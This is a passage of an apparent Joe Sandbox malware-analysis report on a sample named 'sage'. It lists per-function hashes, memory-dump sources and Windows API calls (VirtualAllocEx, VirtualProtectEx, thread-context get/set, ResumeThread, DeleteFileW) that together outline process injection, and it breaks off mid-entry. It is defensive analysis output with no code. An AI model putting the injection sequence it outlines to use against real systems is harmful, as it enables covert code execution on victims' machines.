                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: 6117dab7c14a06315c1ecddbd3d2dc327be3abe8faf0be87ba1c181f15a51ea9
                                                                                                                                                • Instruction ID: 55fe5c534d00812ab5f6d68d778faf1f58e30fd72305e98aab0749ea172d3d06
                                                                                                                                                • Opcode Fuzzy Hash: 6117dab7c14a06315c1ecddbd3d2dc327be3abe8faf0be87ba1c181f15a51ea9
                                                                                                                                                • Instruction Fuzzy Hash: CF212275D003499FCB10CFAAC984BEEBBF5FF48314F10882AE919A7240D7789945CBA0
                                                                                                                                                Function 06F65E08 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F65E86
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: ccb06e37298374bb296305f646a4d8075c92de110d8145c27cf3e94bb68df744
                                                                                                                                                • Instruction ID: d7aedadaa98cf1bdf4082da543ea0ca259aa37c2acfb04bd1d27efab7f362179
                                                                                                                                                • Opcode Fuzzy Hash: ccb06e37298374bb296305f646a4d8075c92de110d8145c27cf3e94bb68df744
                                                                                                                                                • Instruction Fuzzy Hash: A9210475D003098FDB10DFAAC8857AEBBF4AF48314F54842AE819B7241D778A945CFA0
                                                                                                                                                Function 06F64CA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 06F64D1E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: d8fb3b81d9b7c0077b2b6bc5d13b89ec2610270079f61f386092143b7fa2fc8c
                                                                                                                                                • Instruction ID: c40cd25439c6c4521c6b6b65bb47a6bc5fc662f760a574eef19cb020fb657901
                                                                                                                                                • Opcode Fuzzy Hash: d8fb3b81d9b7c0077b2b6bc5d13b89ec2610270079f61f386092143b7fa2fc8c
                                                                                                                                                • Instruction Fuzzy Hash: 14210475D002098FDB50DFAAC8857AEBBF5AF48314F14842AE85AA7340D7789945CFA4
                                                                                                                                                Function 06F65E01 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F65E86
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 7443a46594903d512f74f6c5397d13cb43a60c56609fc0e8975813b0f80d776c
                                                                                                                                                • Instruction ID: 34168a421b92addac2dd40e2982550a01259f3638012f0989c4afc1673ebbf84
                                                                                                                                                • Opcode Fuzzy Hash: 7443a46594903d512f74f6c5397d13cb43a60c56609fc0e8975813b0f80d776c
                                                                                                                                                • Instruction Fuzzy Hash: 7C213575D003098FDB10DFAAC4857EEBBF1AF88314F14842AE819B7241CB789945CFA0
                                                                                                                                                Function 06F64C98 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 06F64D1E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 8819b407aa430addf21758d51275eadd3923f674a0de0182e423889152259001
                                                                                                                                                • Instruction ID: 9dbc75a53eaf83a326d0afdb109348efc331355b7f478bca76635cbf069734c2
                                                                                                                                                • Opcode Fuzzy Hash: 8819b407aa430addf21758d51275eadd3923f674a0de0182e423889152259001
                                                                                                                                                • Instruction Fuzzy Hash: DC213475D003498FDB10DFAAC4857EEBBF1AF48314F14842EE85AA7241D7789A49CFA0
                                                                                                                                                Function 06F65B61 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 06F65BDF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: cf68207fe473064276b6ac570f50c1b5023ac9d262e24fa4d3aa94d3e9b899f8
                                                                                                                                                • Instruction ID: f0ca1b0d2ef4a6943eef7b7b5a421554d8592352a522d662858cbb15c5ddcf2c
                                                                                                                                                • Opcode Fuzzy Hash: cf68207fe473064276b6ac570f50c1b5023ac9d262e24fa4d3aa94d3e9b899f8
                                                                                                                                                • Instruction Fuzzy Hash: 83212776D002499FDB10DFAAC985BEEBBF5BF48324F14842AE419B7240D7389945DFA0
                                                                                                                                                Function 06F65B68 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 06F65BDF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 6b087037a44c36613bd6e926a346d280cbb1f08ebcc11c5e02881480ba43ee2f
                                                                                                                                                • Instruction ID: 5e97945a6a8c368d06cedcb6e715b252c65c740b8f9b026ae78008d16b6c62cd
                                                                                                                                                • Opcode Fuzzy Hash: 6b087037a44c36613bd6e926a346d280cbb1f08ebcc11c5e02881480ba43ee2f
                                                                                                                                                • Instruction Fuzzy Hash: D6211375C002099FDB10DFAAC884AEEBBF5AF48324F54842AE419A7240DB789945CFA1
                                                                                                                                                Function 06C06FD8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 06C07048
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6018498161.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6c00000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                • Opcode ID: 801b99c828b2376191771c57372c0f56d0f2b44b327fdfb2c7ed27a6902e2dd9
                                                                                                                                                • Instruction ID: 76777664a18d10b89f160324fdb8c8714ab7c3e6ca4355b2d724512fb5b698a2
                                                                                                                                                • Opcode Fuzzy Hash: 801b99c828b2376191771c57372c0f56d0f2b44b327fdfb2c7ed27a6902e2dd9
                                                                                                                                                • Instruction Fuzzy Hash: 191136B1C006599BCB14CF9AC444BDEFBB4EF48324F14822AD818B7340D339AA45CFA1
                                                                                                                                                Function 06F1BA58 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1BACB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: d0cc4df20bef6561b1037b61d12f6501e94120c6511e381e7642e06a4e35b374
                                                                                                                                                • Instruction ID: d315e1b7388d2736a1ad02110bf78630fd5fd82da4c7506318a4377937363676
                                                                                                                                                • Opcode Fuzzy Hash: d0cc4df20bef6561b1037b61d12f6501e94120c6511e381e7642e06a4e35b374
                                                                                                                                                • Instruction Fuzzy Hash: 9921D6759006499FCB10DF9AC884BDEFBF4FF48310F14842AE858A7240D378A545CFA1
                                                                                                                                                Function 06F133A8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1341B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: b96e4b860d9cf93c5308e3c08214366db23e9855814df2ad67dc85275a29573f
                                                                                                                                                • Instruction ID: 599924e06bdc2c04cc91f9e7565111b99bd80fb4cf1c239620fc8a0810d9caf8
                                                                                                                                                • Opcode Fuzzy Hash: b96e4b860d9cf93c5308e3c08214366db23e9855814df2ad67dc85275a29573f
                                                                                                                                                • Instruction Fuzzy Hash: FF21D6B59006499FCB10DF9AC884BDEFBF4FB48310F10842AE458A7240D379A545CFA1
                                                                                                                                                Function 06F65381 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F653F6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 56f8f0759d89993a370311c576aa002928191cb9370f1c5ae47a95742fde2568
                                                                                                                                                • Instruction ID: 0913656f205239bcff542086a85020de73c6101100fc67b8d98a1f350df22c6e
                                                                                                                                                • Opcode Fuzzy Hash: 56f8f0759d89993a370311c576aa002928191cb9370f1c5ae47a95742fde2568
                                                                                                                                                • Instruction Fuzzy Hash: 591129759002499FCB10DFAAC844ADFFFF5AF48314F24881AE415B7250C7799955CFA0
                                                                                                                                                Function 06F65388 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F653F6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 83952ad338bb449df138c13d3bb3af3b89c849140f15adeaeab52b1fa6b8e4a7
                                                                                                                                                • Instruction ID: d53f616882bceb1d0a0905d4acc4d693ee6e05de13122fbefdaa8d23ad08b3df
                                                                                                                                                • Opcode Fuzzy Hash: 83952ad338bb449df138c13d3bb3af3b89c849140f15adeaeab52b1fa6b8e4a7
                                                                                                                                                • Instruction Fuzzy Hash: 5A1126758002499FCB10DFAAC845ADFFFF5AF48314F24881AE415B7240C7799955CFA0
                                                                                                                                                Function 06F66068 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,8B550510), ref: 06F660D2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: b4de732d3ae1493fbe8786b3a57184236a8d2dca4210d43bf36f8b36caf1b9b3
                                                                                                                                                • Instruction ID: ac6bf47a8ca9c181f40b17359781c754c10b64401eae48ad80115b0419b8e0bd
                                                                                                                                                • Opcode Fuzzy Hash: b4de732d3ae1493fbe8786b3a57184236a8d2dca4210d43bf36f8b36caf1b9b3
                                                                                                                                                • Instruction Fuzzy Hash: 1A115875D002489FDB20DFAAD8847EEFFF5AF88314F24881AD41AA7340C7399945CBA0
                                                                                                                                                Function 06F66070 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,8B550510), ref: 06F660D2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: d9844b5031a57cb84cfec06bea6d8ed1cf0567ee68eb67977b499ecd419deb21
                                                                                                                                                • Instruction ID: c7a193ed0e6ff9d5747d145e056e74cbd1e1f0aae080c326947a794eb070b640
                                                                                                                                                • Opcode Fuzzy Hash: d9844b5031a57cb84cfec06bea6d8ed1cf0567ee68eb67977b499ecd419deb21
                                                                                                                                                • Instruction Fuzzy Hash: 5A112875D002489BDB10DFAAC84479EFBF5AF88314F24841AD419A7340C779A945CBA1
                                                                                                                                                Function 02A41580 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: 77063990177cba57c13e7bc85b8671e2c81ee8c2b5e47d7d3fc95c517cae22c4
                                                                                                                                                • Instruction ID: 950aef30501464efe8b1a47a9934611520c78075879625aae8dfb726bcc92a23
                                                                                                                                                • Opcode Fuzzy Hash: 77063990177cba57c13e7bc85b8671e2c81ee8c2b5e47d7d3fc95c517cae22c4
                                                                                                                                                • Instruction Fuzzy Hash: 09317E31704249EFCB159FA4D894AAE7BA2FBC8354F044028F90A97394CF75DDA1CBA5
                                                                                                                                                Function 02A42710 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: eb2fd0cbd0ed24a48082cc4aa0035162c5bb9fd37085e2051d55edecd42ada61
                                                                                                                                                • Instruction ID: 801c956b7edf638f7c9449094d571269e929638e8c124510f8da46d9d340371e
                                                                                                                                                • Opcode Fuzzy Hash: eb2fd0cbd0ed24a48082cc4aa0035162c5bb9fd37085e2051d55edecd42ada61
                                                                                                                                                • Instruction Fuzzy Hash: BC21BC39704611CFD7299B79D8A4B6ABBA2EFC97617144179FD0ACB350CF20DC428BA0
                                                                                                                                                Function 02A47A80 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: d957ba155b64ef31cdeda63680a9e6b1da9086e8060e101be057abcdcbd7ebd5
                                                                                                                                                • Instruction ID: 78e32823b9d6090d5d40c5ebf8673813997c62547c73dd8e27ac017bd9b9340a
                                                                                                                                                • Opcode Fuzzy Hash: d957ba155b64ef31cdeda63680a9e6b1da9086e8060e101be057abcdcbd7ebd5
                                                                                                                                                • Instruction Fuzzy Hash: 2E21A4303042918FDB25177A8CE4B7DBAAAAFC565CB18407ADA43CB3A1DF25C843D791
                                                                                                                                                Function 02A47A90 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: 743ad26f024a2018e533e932d33197fa3bb418de15bc98d98f55dda0e2c92286
                                                                                                                                                • Instruction ID: de4893ff6627466bb652638fe08be5b54c9dda8769c5f5dd417f862376eb9ab3
                                                                                                                                                • Opcode Fuzzy Hash: 743ad26f024a2018e533e932d33197fa3bb418de15bc98d98f55dda0e2c92286
                                                                                                                                                • Instruction Fuzzy Hash: F72130303042918BDB255B6A8CE4B7AB69B9FC465CF144039DA07CB794DF65CC429291
                                                                                                                                                Function 02A49178 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: 27cc8e72f63786167c1bc15fe143ab3eb2e5e90ec8924bfb31ddd4f6cf0ab26e
                                                                                                                                                • Instruction ID: 6e9b5b58b8f87cfaaefb9884360b4638721e893871c29bc7c06028cf16c0a6a3
                                                                                                                                                • Opcode Fuzzy Hash: 27cc8e72f63786167c1bc15fe143ab3eb2e5e90ec8924bfb31ddd4f6cf0ab26e
                                                                                                                                                • Instruction Fuzzy Hash: 6A213C70A0431AEBEB24DFA0D894BAFBBB5BF84704F104129E801A7394DF75D955CBA0
                                                                                                                                                Function 02A41570 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: 2537d53a209de34e4a574a377ef5c1bf8060c434ab462eeb96155fafc11dc658
                                                                                                                                                • Instruction ID: 9322a95be42406b5337914cd36d0ffcbc0a5b4b31b9905d4cef5612904514e93
                                                                                                                                                • Opcode Fuzzy Hash: 2537d53a209de34e4a574a377ef5c1bf8060c434ab462eeb96155fafc11dc658
                                                                                                                                                • Instruction Fuzzy Hash: 16219D31709248DFCB169F64D8547AA7BA2FBC9314F048069F80A8B395CF74CC96CBA5
                                                                                                                                                Function 02A42720 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: a5aa08098b4914ebacae808184a979134a71fbd808b4ff82d8c92be12ca16b57
                                                                                                                                                • Instruction ID: c713da1e4717700638cc089b758a94a0208212ec3d346ac072bbf756a9c0ac60
                                                                                                                                                • Opcode Fuzzy Hash: a5aa08098b4914ebacae808184a979134a71fbd808b4ff82d8c92be12ca16b57
                                                                                                                                                • Instruction Fuzzy Hash: 13118E35704711DFC7195B2AC898E2AB7A6EFC87657154578FD0ADB360CF20DC028BA4
                                                                                                                                                Function 02A49168 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: e4e53ceae18356947f1968b82d595bd2a48c251ca14891aa6589d0ac6ae258de
                                                                                                                                                • Instruction ID: b7f92e9543aaeac8df00675917b55342865ea16a68498aaf156b170648dba5c0
                                                                                                                                                • Opcode Fuzzy Hash: e4e53ceae18356947f1968b82d595bd2a48c251ca14891aa6589d0ac6ae258de
                                                                                                                                                • Instruction Fuzzy Hash: 8411AF70A04359DFDB24CBA4D894BAFBBB2BF84304F10426DE811A7394CF349846CB50
                                                                                                                                                Function 02A4DCB0 Relevance: 1.3, Instructions: 1261COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 932b025958b63fdee29fa2a12df23a5c044f4edf4840a7680d4c29d34459ab30
                                                                                                                                                • Instruction ID: 74884c111ed2044ed728b013f7125c53a2c5b73c4c95e02095dd1f0bca0fcfce
                                                                                                                                                • Opcode Fuzzy Hash: 932b025958b63fdee29fa2a12df23a5c044f4edf4840a7680d4c29d34459ab30
                                                                                                                                                • Instruction Fuzzy Hash: 56B22674A10219CFCB24EFB8D99969DBBB1BB88300F5089E9D449F3254DE38AD85CF51
                                                                                                                                                Function 02A47BA0 Relevance: .7, Instructions: 702COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: aa43847c7f98f2bc71b66296057d7a63e9dc23326ad25a79ef212c31625c4a47
                                                                                                                                                • Instruction ID: 2f09d1559c690a5afe912cfca7922f071f814ab7c9a75a24dff06bb6dc3e2055
                                                                                                                                                • Opcode Fuzzy Hash: aa43847c7f98f2bc71b66296057d7a63e9dc23326ad25a79ef212c31625c4a47
                                                                                                                                                • Instruction Fuzzy Hash: B352E034A001598FDB649BA4C860B9EBB72FF89300F1085A9D10BAB399DF399D459F71
                                                                                                                                                Function 02A43798 Relevance: .5, Instructions: 529COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 84b663422584418d2c4d90fee56d7ebce571d05cefd2467b9d4640bc7f7d8e59
                                                                                                                                                • Instruction ID: 5f92311066eae193e8a2899ad989d622ca3bbaab753c99aa5b687f9abf6ddae0
                                                                                                                                                • Opcode Fuzzy Hash: 84b663422584418d2c4d90fee56d7ebce571d05cefd2467b9d4640bc7f7d8e59
                                                                                                                                                • Instruction Fuzzy Hash: 4A225830A00608DFCB14DF69C894A9EBBF2EF89314F258599E856DB3A1DF30E945CB50
                                                                                                                                                Function 02A49B48 Relevance: .5, Instructions: 463COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7b06eeace01105eb4fc1b933a43c0dbce1594b56a1a0fcc9ce5937321250d7ec
                                                                                                                                                • Instruction ID: 070974c7bd288a2f4219e9daa6dd2b2796d1e831d1c5be5f259508928a9d3b93
